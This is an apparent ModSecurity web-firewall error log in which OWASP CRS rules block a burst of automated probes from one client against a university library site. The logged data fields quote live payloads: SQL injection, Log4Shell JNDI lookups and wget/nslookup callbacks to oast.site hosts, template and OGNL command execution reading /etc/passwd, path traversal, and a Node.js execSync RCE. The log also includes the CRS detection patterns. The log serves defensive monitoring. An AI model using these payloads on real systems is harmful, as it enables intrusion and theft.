[Tue Aug 29 11:31:53.389135 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAQSWPIAAAA0"]
[Tue Aug 29 11:31:54.412067 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQnF5YAAAAF"]
[Tue Aug 29 11:31:54.423651 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAP6NQ4AAAAQ"]
[Tue Aug 29 11:31:55.312078 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAP6NQ8AAAAQ"]
[Tue Aug 29 11:31:55.430072 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQnF5wAAAAF"]
[Tue Aug 29 11:31:56.392797 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg1wsitir9cs7cw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAAQkBZgAAAAC"]
[Tue Aug 29 11:31:56.433271 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAPiBnwAAAAB"]
[Tue Aug 29 11:31:57.417692 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAANsAWoAAAAD"]
[Tue Aug 29 11:31:57.433172 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vcCo-f0AAAQnF6kAAAAF"]
[Tue Aug 29 11:31:58.379469 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQMrykAAAAu"]
[Tue Aug 29 11:31:58.456951 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAQR4@MAAAAz"]
[Tue Aug 29 11:31:59.318327 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlg88x88hjyd1p6t.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQOv5EAAAAw"]
[Tue Aug 29 11:32:04.360205 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAQUIBAAAAA2"]
[Tue Aug 29 11:32:05.451707 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQR4@8AAAAz"]
[Tue Aug 29 11:32:06.377238 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQKOdsAAAAs"]
[Tue Aug 29 11:32:06.483112 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAP5mOUAAAAM"]
[Tue Aug 29 11:32:07.738826 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAQKOeUAAAAs"]
[Tue Aug 29 11:32:08.351564 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP@M5IAAAAZ"]
[Tue Aug 29 11:32:10.326804 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgbwnrnbj8zhqun.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAP5mPAAAAAM"]
[Tue Aug 29 11:32:10.405029 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg3c6pwqimp53es.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAANsAY8AAAAD"]
[Tue Aug 29 11:32:12.366301 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQOv64AAAAw"]
[Tue Aug 29 11:32:13.317662 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgit4nzqhkkrm1c.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgit4nzqhkkrm1c.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAANWgYUAAAAG"]
[Tue Aug 29 11:32:13.332785 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQMr0gAAAAu"]
[Tue Aug 29 11:32:15.332298 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQUIC0AAAA2"]
[Tue Aug 29 11:32:15.411045 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfeb.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAN9sUMAAAAJ"]
[Tue Aug 29 11:32:15.411087 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO10z8Co-f0AAAN9sUMAAAAJ"]
[Tue Aug 29 11:32:15.415071 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQV4VEAAAA3"]
[Tue Aug 29 11:32:16.307157 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAPDoDMAAAAP"]
[Tue Aug 29 11:32:17.309179 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAQOv8MAAAAw"]
[Tue Aug 29 11:32:18.359218 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQKOfsAAAAs"]
[Tue Aug 29 11:32:18.364607 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAANwNxoAAAAb"]
[Tue Aug 29 11:32:21.315430 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] 